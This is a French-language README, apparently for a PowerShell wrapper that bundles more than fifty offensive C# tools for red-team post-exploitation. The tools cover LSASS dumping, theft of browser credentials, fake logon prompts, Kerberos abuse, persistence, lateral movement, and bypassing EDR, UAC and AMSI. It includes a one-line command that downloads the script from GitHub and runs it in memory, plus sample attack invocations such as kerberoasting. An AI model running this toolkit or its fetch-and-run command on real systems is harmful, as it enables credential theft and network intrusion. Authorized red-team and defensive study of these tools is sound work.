
Wrapper PowerShell regroupant plus de 50 outils de sécurité offensive en C# pour la post-exploitation, l'élévation de privilèges, l'extraction d'identifiants, le déplacement latéral et la reconnaissance Active Directory dans le cadre d'engagements d'équipe rouge.
De nombreux projets offensifs C# utiles, transformés en PowerShell pour une utilisation facile.
Pourquoi ? À mon avis personnel, le PowerShell offensif n'est pas mort à cause d'AMSI, du Script-block-logging, du mode langage contraint (Constrained Language Mode) ou d'autres fonctionnalités de protection. N'importe lequel de ces mécanismes peut être contourné. Étant donné que la plupart des nouveaux projets innovants en sécurité offensive sont écrits en C#, j'ai décidé de les rendre également utilisables dans PowerShell.
Alors, qu'ai-je fait concrètement ici ?
[System.Reflection.Assembly]::Load($DecompressedDecodedBinary).C'est un processus très simple mais chronophage pour de nombreux dépôts.
Quels outils sont inclus ?
Internalmonologue
Internal Monologue Attack : récupération de hashs NTLM sans toucher à LSASS
@Crédit à : https://github.com/eladshamir/Internal-Monologue
Seatbelt
Seatbelt est un projet C# qui effectue un certain nombre de « vérifications de sécurité » orientées hôte, pertinentes tant pour la sécurité offensive que défensive.
@Crédit à : https://github.com/GhostPack/Seatbelt
SharpWeb
Projet .NET 2.0 CLR pour récupérer les identifiants enregistrés des navigateurs Google Chrome, Mozilla Firefox et Microsoft Internet Explorer/Edge.
@Crédit à : https://github.com/djhohnstein/SharpWeb
UrbanBishop
Crée une section RW locale dans UrbanBishop, puis mappe cette section en RX dans un processus distant. Chargement de shellcode simplifié.
@Crédit à : https://github.com/FuzzySecurity/Sharp-Suite
SharpUp
SharpUp est un portage C# de diverses fonctionnalités de PowerUp.
@Crédit à : https://github.com/GhostPack/SharpUp
Rubeus
Rubeus est un ensemble d'outils C# pour l'interaction brute avec Kerberos et ses abus.
@Crédit à : https://github.com/GhostPack/Rubeus && https://github.com/gentilkiwi/kekeo/
SharPersist
Boîte à outils de persistance Windows écrite en C#.
@Crédit à : https://github.com/fireeye/SharPersist
Sharpview
Implémentation C# de PowerView de harmj0y
@Crédit à : https://github.com/tevora-threat/SharpView
winPEAS
Vérifie la checklist d'élévation de privilèges Windows Locale du site book.hacktricks.xyz
@Crédit à : https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS
Lockless
Lockless permet la copie de fichiers verrouillés.
@Crédit à : https://github.com/GhostPack/Lockless
SharpChromium
Projet .NET 4.0 CLR pour récupérer les données Chromium, comme les cookies, l'historique et les connexions enregistrées.
@Crédit à : https://github.com/djhohnstein/SharpChromium
SharpDPAPI
SharpDPAPI est un portage C# de certaines fonctionnalités DPAPI de Mimikatz.
@Crédit à : https://github.com/GhostPack/SharpDPAPI && https://github.com/gentilkiwi/mimikatz/
SharpShares
Énumère tous les partages réseau du domaine courant. Peut également résoudre les noms en adresses IP.
@Crédit à : https://github.com/djhohnstein/SharpShares
SharpSniper
Trouve des utilisateurs spécifiques dans Active Directory via leur nom d'utilisateur et leur adresse IP de connexion
@Crédit à : https://github.com/HunnicCyber/SharpSniper
SharpSpray
SharpSpray est un ensemble de code simple pour effectuer une attaque par pulvérisation de mots de passe (password spraying) contre tous les utilisateurs d'un domaine via LDAP, compatible avec Cobalt Strike.
@Crédit à : https://github.com/jnqpblc/SharpSpray
Watson
Énumère les KB manquants et suggère des exploits pour les vulnérabilités utiles d'élévation de privilèges
@Crédit à : https://github.com/rasta-mouse/Watson
Grouper2
Trouve des vulnérabilités dans les stratégies de groupe Active Directory
@Crédit à : https://github.com/l0ss/Grouper2
Tokenvator
Un outil pour élever ses privilèges avec les jetons Windows
@Crédit à : https://github.com/0xbadjuju/Tokenvator
SauronEye
Outil de recherche pour trouver des fichiers spécifiques contenant des mots spécifiques, par exemple des fichiers contenant des mots de passe.
@Crédit à : https://github.com/vivami/SauronEye
Il suffit de charger le script principal avec
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpPack.ps1')
et de choisir l'outil en paramètre d'interrupteur (switch), par exemple :
PowerSharpPack -seatbelt -Command "AMSIProviders"
Si vous souhaitez passer plusieurs paramètres au binaire, vous pouvez utiliser les guillemets comme ceci :
PowerSharpPack -Rubeus -Command "kerberoast /outfile:Roasted.txt"
Si vous ne voulez pas charger tous les binaires pour certaines raisons, vous pouvez utiliser les scripts PowerShell par binaire situés dans le dossier PowerSharpBinaries.
Projets également disponibles en tant que script PowerShell autonome :
SharpCloud
Simple C# pour vérifier l'existence de fichiers d'identifiants liés à AWS, Microsoft Azure et Google Compute.
@Crédit à : https://github.com/chrismaddalena/SharpCloud
SharpSSDP
Découverte de services SSDP
@Crédit à : https://github.com/rvrsh3ll/SharpSSDP
DAFT
DAFT : cadre et boîte à outils d'audit de bases de données (Database Audit Framework & Toolkit)
@Crédit à : https://github.com/NetSPI/DAFT
Get-RBCD-Threaded
Outil pour découvrir les chemins d'attaque par délégation contrainte basée sur les ressources (Resource-Based Constrained Delegation) dans les environnements Active Directory
@Crédit à : https://github.com/FatRodzianko/Get-RBCD-Threaded
SharpGPO-RemoteAccessPolicies
Outil C# pour énumérer les politiques d'accès à distance via les stratégies de groupe.
@Crédit à : https://github.com/FSecureLABS/SharpGPO-RemoteAccessPolicies
SharpAllowedToAct
Prise de contrôle d'objet ordinateur via la délégation contrainte basée sur les ressources (msDS-AllowedToActOnBehalfOfOtherIdentity)
@Crédit à : https://github.com/pkb1s/SharpAllowedToAct
WireTap
Projet .NET 4.0 pour interagir avec le matériel vidéo, audio et le clavier.
@Crédit à : https://github.com/djhohnstein/WireTap
SharpClipboard
Moniteur de presse-papiers C#
@Crédit à : https://github.com/slyd0g/SharpClipboard
SharpPrinter
Découvre les imprimantes et vérifie les vulnérabilités
@Crédit à : https://github.com/rvrsh3ll/SharpPrinter
SharpHide
Outil pour créer des clés de registre cachées.
@Crédit à : https://github.com/outflanknl/SharpHide
SpoolSample
Outil de preuve de concept (PoC) pour forcer des hôtes Windows à s'authentifier sur d'autres machines via l'interface RPC MS-RPRN. Possible également via d'autres protocoles.
@Crédit à : https://github.com/leechristensen/SpoolSample
SharpGPOAbuse
SharpGPOAbuse est une application .NET écrite en C# qui peut être utilisée pour exploiter les droits d'édition d'un utilisateur sur un objet de stratégie de groupe (GPO) afin de compromettre les objets contrôlés par ce GPO.
@Crédit à : https://github.com/FSecureLABS/SharpGPOAbuse
SharpDump
SharpDump est un portage C# de la fonctionnalité Out-Minidump.ps1 de PowerSploit.
@Crédit à : https://github.com/GhostPack/SharpDump
SharpHound3
Collecteur de données C# pour le projet BloodHound, version 3
@Crédit à : https://github.com/BloodHoundAD/SharpHound3
PostDump
Autre outil pour effectuer un minidump du processus LSASS en utilisant quelques techniques pour éviter la détection.
@Crédit à : https://github.com/YOLOP0wn/POSTDump
SharpLocker
SharpLocker permet d'obtenir les identifiants de l'utilisateur courant en faisant apparaître un faux écran de verrouillage Windows ; toute la sortie est envoyée vers la console, ce qui fonctionne parfaitement avec Cobalt Strike.
@Crédit à : https://github.com/Pickfordmatt/SharpLocker
Eyewitness
EyeWitness est conçu pour prendre des captures d'écran de sites web, fournir des informations d'en-tête serveur et identifier les identifiants par défaut si possible.
@Crédit à : https://github.com/FortyNorthSecurity/EyeWitness
FakeLogonScreen
Faux écran de connexion Windows pour voler des mots de passe
@Crédit à : https://github.com/bitsadmin/fakelogonscreen
P0wnedShell
Boîte à outils de post-exploitation PowerShell Runspace
@Crédit à : https://github.com/Cn33liz/p0wnedShell
Safetykatz
SafetyKatz est une combinaison d'une version légèrement modifiée du projet Mimikatz de @gentilkiwi et du chargeur PE .NET de @subTee Je l'ai modifié une nouvelle fois avec ma propre version obfusquée de Mimikatz.
@Crédit à : https://github.com/GhostPack/SafetyKatz
InveighZero
Outil de spoofing/man-in-the-middle LLMNR/mDNS/NBNS/DNS/DHCPv6 en C# Windows.
@Crédit à : https://github.com/Kevin-Robertson/InveighZero
SharpSploit
SharpSploit est une bibliothèque de post-exploitation .NET écrite en C#.
@Crédit à : https://github.com/cobbr/SharpSploit
Snaffler
Un outil pour les testeurs d'intrusion afin de trouver de délicieuses bonbons (candy), par @l0ss et @Sh3r4 ( Twitter: @/mikeloss et @/sh3r4_hax ).
@Crédit à : https://github.com/SnaffCon/Snaffler
BadPotato
Printspoofer d'itm4n en C#.
@Crédit à : https://github.com/BeichenDream/BadPotato
BetterSafetyKatz
Fork de SafetyKatz qui récupère dynamiquement la dernière version pré-compilée de Mimikatz directement depuis le dépôt GitHub de gentilkiwi, patch les signatures à l'exécution et utilise SharpSploit DInvoke pour charger le PE en mémoire.
@Crédit à : https://github.com/Flangvik/BetterSafetyKatz
SharpKatz
Portage C# des commandes sekurlsa::logonpasswords, sekurlsa::ekeys et lsadump::dcsync de mimikatz.
@Crédit à : https://github.com/b4rtik/SharpKatz
Gopher
Outil C# pour découvrir les « low hanging fruits » (cibles faciles).
@Crédit à : https://github.com/EncodeGroup/Gopher
SharpOxidResolver
IOXIDResolver d'AirBus Security/PingCastle.
@Crédit à : https://github.com/vletoux/pingcastle/
SharpBlock
Méthode pour contourner les DLL de projection active des EDR en empêchant l'exécution du point d'entrée.
@Crédit à : https://github.com/CCob/SharpBlock
SharpLoginPrompt
Ce programme crée une invite de connexion pour recueillir le nom d'utilisateur et le mot de passe de l'utilisateur courant. Ce projet permet à une équipe rouge de hameçonner le nom d'utilisateur et le mot de passe de l'utilisateur courant sans toucher à lsass et sans disposer de privilèges administrateur sur le système.
@Crédit à : https://github.com/shantanu561993/SharpLoginPrompt
ThunderFox
Récupère les données (contacts, emails, historique, cookies et identifiants) de Thunderbird et Firefox.
@Crédit à : https://github.com/V1V1/SharpScribbles
StickyNotesExtract
Extrait les données de la base de données des notes autocollantes Windows. Fonctionne sur Windows 10 Build 1607 et versions ultérieures. Ce projet ne dépend d'aucune dépendance externe.
@Crédit à : https://github.com/V1V1/SharpScribbles
SCShell
Outil de mouvement latéral sans fichier (fileless) qui repose sur ChangeServiceConfigA pour exécuter une commande.
@Crédit à : https://github.com/Mr-Un1k0d3r/SCShell
SharpSecDump
Portage .Net de la fonctionnalité de dump à distance SAM + LSA Secrets de secretsdump.py d'impacket.
@Crédit à : https://github.com/G0ldenGunSec/SharpSecDump
SharpHandler
Ce projet réutilise les handles ouverts vers lsass pour analyser ou minidumper lsass, vous n'avez donc pas besoin d'utiliser votre propre handle lsass pour interagir avec lui.
@Crédit à : https://github.com/jfmaes/SharpHandler
SharpRDP
Application console .NET pour le protocole de bureau à distance (RDP) afin d'exécuter des commandes authentifiées.
@Crédit à : https://github.com/0xthirteen/SharpRDP
SharpMove
Projet .NET pour effectuer une exécution distante authentifiée.
@Crédit à : https://github.com/0xthirteen/SharpMove
SharpStay
Projet .NET pour installer une persistance
@Crédit à : https://github.com/0xthirteen/SharpStay
SharpPrintNightmare
Implémentation C# de PrintNightmare CVE-2021-1675/CVE-2021-34527
@Crédit à : https://github.com/cube0x0/CVE-2021-1675/tree/main/SharpPrintNightmare/SharpPrintNightmare
Certify
Abus des certificats Active Directory.
@Crédit à : https://github.com/GhostPack/Certify
Farmer
Farmer est un projet pour collecter des hashs NetNTLM dans un domaine Windows. Farmer y parvient en créant un serveur WebDAV local qui oblige le mini-redirecteur WebDAV à s'authentifier depuis tout client se connectant.
@Crédit à : https://github.com/mdsecactivebreach/Farmer
SharpBypassUAC
Outil C# pour les contournements de l'UAC
@Crédit à : https://github.com/FatRodzianko/SharpBypassUAC
StandIn
StandIn est une petite boîte à outils de post-exploitation AD .NET35/45
@Crédit à : https://github.com/FuzzySecurity/StandIn
Carbuncle
Outil pour interagir avec l'interopérabilité Outlook lors d'engagements d'équipe rouge
@Crédit à : https://github.com/checkymander/Carbuncle
Whisker
Whisker est un outil C# pour prendre le contrôle de comptes utilisateur et ordinateur Active Directory en manipulant leur attribut msDS-KeyCredentialLink, ajoutant ainsi des « Shadow Credentials » au compte cible.
@Crédit à : https://github.com/eladshamir/Whisker
SharpLdapRelayScan
Portage C# de LdapRelayScan
@Crédit à : https://github.com/klezVirus/SharpLdapRelayScan
LdapSignCheck
Projet C# pour vérifier la signature LDAP.
@Crédit à : https://github.com/cube0x0/LdapSignCheck
SharpImpersonation
SharpImpersonation - Un outil d'usurpation d'identité utilisateur - par jeton (Token) ou injection de shellcode.
@Crédit à : https://github.com/S3cur3Th1sSh1t/SharpImpersonation
SharpWSUS
SharpWSUS est un outil CSharp pour le mouvement latéral via WSUS. Un article de blog correspondant (https://labs.nettitude.com/blog/introducing-sharpwsus/) fournit des informations plus détaillées sur l'outil, son cas d'utilisation et sa détection.
@Crédit à : https://github.com/nettitude/SharpWSUS
MalSCCM
Cet outil permet d'abuser de serveurs SCCM locaux ou distants pour déployer des applications malveillantes sur les hôtes qu'ils gèrent. Pour utiliser cet outil, votre processus actuel doit disposer de droits d'administration sur le serveur SCCM. Typiquement, les déploiements SCCM placent le serveur de gestion et le serveur principal sur le même hôte, auquel cas l'hôte retourné par la commande locate peut être utilisé comme serveur principal.
@Crédit à : https://github.com/nettitude/MalSCCM
KrbRelay
Framework pour le relais Kerberos
@Crédit à : https://github.com/cube0x0/KrbRelay
SharpSCCM
Un utilitaire C# pour interagir avec SCCM
@Crédit : https://github.com/Mayyhem/SharpSCCM
ShadowSpray
Un outil pour pulvériser des Shadow Credentials sur l'ensemble d'un domaine dans l'espoir d'abuser de DACLs GenericWrite/GenericAll oubliées sur d'autres objets du domaine.
@Crédit : https://github.com/Dec0ne/ShadowSpray
Grouper3
Trouve des vulnérabilités dans les stratégies de groupe Active Directory, mais fait mieux que Grouper2.
@Crédit à : https://github.com/Group3r/Group3r
HandleKatz
Dump PIC de lsass utilisant des handles clonés
@Crédit à : https://github.com/codewhitesec/HandleKatz
NanoDump
Dumper LSASS comme il se doit
@Crédit à : https://github.com/helpsystems/nanodump
PPLDump
Dumper la mémoire d'un PPL avec une exploitation au niveau utilisateur
@Crédit à : https://github.com/itm4n/PPLdump